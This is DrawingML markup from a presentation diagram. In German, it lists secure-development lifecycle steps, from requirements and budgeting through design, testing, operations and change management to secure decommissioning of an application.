            <a:t>Analysieren Sie Ihre Implementierungs- und Prüfungsaktivitäten hinsichtlich der Hauptursachen und Muster für Sicherheitslücken. Treiben Sie so strategische und systemische Verbesserungen in Ihrer Organisation voran. Lernen Sie aus Fehlern und setzen Sie positive Anreize um Verbesserungen zu fördern</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="9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dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2085538" y="5488479"/>
        <a:ext cx="5451678" cy="997023"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="5370958"/>
          <a:ext cx="938893" cy="123206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endParaRPr lang="en-US" sz="1050" b="1" kern="120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38540" y="5416791"/>
        <a:ext cx="847227" cy="11403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3484591" y="-2183778"/>
          <a:ext cx="1004800"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Fachliche Anforderungen mit dem Fachbereich aufnehmen und vereinbaren, inkl. dem Schutzbedarf aller Daten-Assets in Bezug auf Vertraulichkeit, Authentizität, Integrität und Verfügbarkeit, sowie der erwarteten Anwendungslogik.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Zusammenstellen der technischen Anforderungen inkl. funktionalen und nicht-funktionalen Anforderungen an die Sicherheit.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Planen und vereinbaren des Budgets, das alle Aspekte abdeckt, vom Design, Entwicklung, Testen bis hin zum Betrieb sowie die Sicherheitsmaßnahmen.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1320888" y="78025"/>
        <a:ext cx="5332207" cy="906700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1919"/>
          <a:ext cx="1115983" cy="105891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de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Anforderungs- und Ressourcen-Management</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="207546" y="53611"/>
        <a:ext cx="1012599" cy="955527"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3365763" y="-958991"/>
          <a:ext cx="1242456"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Die Anforderungen mit internen oder externen Entwicklern vereinbaren, inkl. Richtlinien, Sicherheits-Vorgaben und -Prozesse, wie z.B. sicherer Softwareentwicklungsprozess (SDLC), Best Practices.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Bewerten Sie den Erfüllungsgrad der technischen Anforderungen inkl. Planungs- und Design-Phase.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Vereinbaren Sie alle technischen Anforderungen inkl. Design, Sicherheit und Service-Level-Agreements (SLAs).</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Nutzen Sie Vorlagen und Checklisten, z.B. den </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="12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a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" dirty="0" err="1">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Contract</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="12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 Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="12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2"/>
            </a:rPr>
            <a:t>deutsch</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>). </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Hinweis: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" b="0" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:rPr>
            <a:t>Das Dokument ist ausschließlich als Orientierungshilfe anzusehen, es bezieht sich auf US-Recht. Konsultieren Sie in jedem Fall einen spezialisierten Anwalt, bevor Sie es benutzen</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1332490" y="1195586"/>
        <a:ext cx="5309003" cy="1121152"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1124912"/>
          <a:ext cx="1115983" cy="1262498"/>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20955" rIns="0" bIns="20955" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="466725" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Ausschreibung und</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Vergabe</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210332" y="1179390"/>
        <a:ext cx="1007027" cy="1153542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3361210" y="368248"/>
          <a:ext cx="1251561"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Vereinbaren Sie die Planung und das Design der Anwendung mit den Entwicklern und internen Stakeholdern, z.B</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 Sicherheits-Spezialisten</a:t>
          </a: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a:t>
          </a:r>
          <a:endParaRPr lang="de-DE" sz="800" strike="sngStrike" kern="1200" noProof="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="4E8542"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Definieren Sie, unterstützt von Sicherheits-Spezialisten, die Sicherheits-Architektur, allgemeine vorbeugende Maßnahmen und gezielte Gegenmaßnahmen entsprechend dem Schutzbedarf und dem erwarteten Gefährdungsniveau.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Stellen Sie sicher, dass der Anwendungseigentümer Restrisiken akzeptiert oder zusätzliches Budget bereitstellt.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Stellen Sie sicher, dass es in jedem Sprint Sicherheits-Stories enthalten sind, die Auflagen für nicht-funktionale Anforderungen enthalten.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1332933" y="2518717"/>
        <a:ext cx="5308115" cy="1129369"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="2451492"/>
          <a:ext cx="1115983" cy="1263818"/>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de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Planung</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>und </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Design</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210332" y="2505970"/>
        <a:ext cx="1007027" cy="1154862"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{992D08B6-B207-435B-A893-D17B49418ACB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3249386" y="1842042"/>
          <a:ext cx="1467726"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Automatisieren Sie das </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" dirty="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Deployment</a:t>
          </a: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 von Anwendungen, Schnittstellen und allen benötigten Komponenten mit sicheren Konfigurationsvoreinstellungen, inkl. der benötigen Berechtigungen.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pP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Testen Sie die technischen Funktionen und die Integration in die IT-Architektur, koordinieren Sie fachliche Tests.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Erzeugen Sie “</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Use</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 und “</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Abuse</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-Testfälle” aus technischer und fachlicher Sicht.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Koordinieren Sie Sicherheits-Tests gemäß den internen Prozessen, dem Schutzbedarf und dem angenommenen Gefährdungsniveau der Anwendung.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Nehmen Sie die Anwendung i</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE"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n Betrieb </a:t>
          </a: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und übernehmen Sie ggf. Daten aus Altanwendungen.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Vervollständigen Sie die Dokumentation, inkl. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" strike="noStrike" kern="1200" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>in</a:t>
          </a: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 der </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" dirty="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Configuration</a:t>
          </a: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 Management Data Base (CMDB) und die Sicherheitsarchitektur.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1342395" y="3892329"/>
        <a:ext cx="5281708" cy="1324430"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="3779392"/>
          <a:ext cx="1114893" cy="155030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de-DE" sz="1050" b="1" kern="1200" noProof="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Deployment</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, Testen und Rollout</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210279" y="3833817"/>
        <a:ext cx="1006043" cy="1441452"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3411293" y="3330153"/>
          <a:ext cx="1143914"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Das Betriebshandhandbuch muss Vorgaben für den sicheren Betrieb der Anwendung enthalten,</a:t>
          </a:r>
          <a:b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b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z.B. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Patchmanagement</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a:t>
          </a:r>
          <a:endParaRPr lang="de-DE" sz="900" strike="sngStrike" kern="1200" noProof="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Sensibilisieren Sie die Anwender für Sicherheitsaspekte und lösen Sie Konflikte zwischen Benutzbarkeit und Sicherheit.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Planen und begleiten Sie </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" noProof="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Changes</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 z.B. Versionswechsel der Anwendung oder anderer Komponenten wie das Betriebssystem, Middleware und Bibliotheken.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Aktualisieren Sie die vollständige Dokumentation, inkl. der CMDB, der Sicherheitsarchitektur, vorbeugende Maßnahmen, Gegenmaßnahmen und das Betriebshandbuch.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1326589" y="5526539"/>
        <a:ext cx="5313322" cy="1032232"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="5393776"/>
          <a:ext cx="1114893" cy="1297756"/>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de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Betrieb und Change- Management</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210279" y="5448201"/>
        <a:ext cx="1006043" cy="1188906"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3668669" y="4438363"/>
          <a:ext cx="636643"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18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Weiterhin benötigte Daten sollten archiviert werden, alle anderen Daten sollten sicher gelöscht werden.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pP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Nehmen Sie die Anwendung auf sichere Weise außer Betrieb, inkl. dem Löschen von nicht mehr benötigten Benutzerkonten, Rollen und Rechten.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pP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Ändern Sie den Zustand der Anwendung in der CMDB auf "außer Betrieb“.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1302915" y="6866273"/>
        <a:ext cx="5368151" cy="574487"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="6755614"/>
          <a:ext cx="1115983" cy="795804"/>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de-DE" sz="1050" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Außerbetrieb-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="1050" b="1" kern="1200" noProof="0" err="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
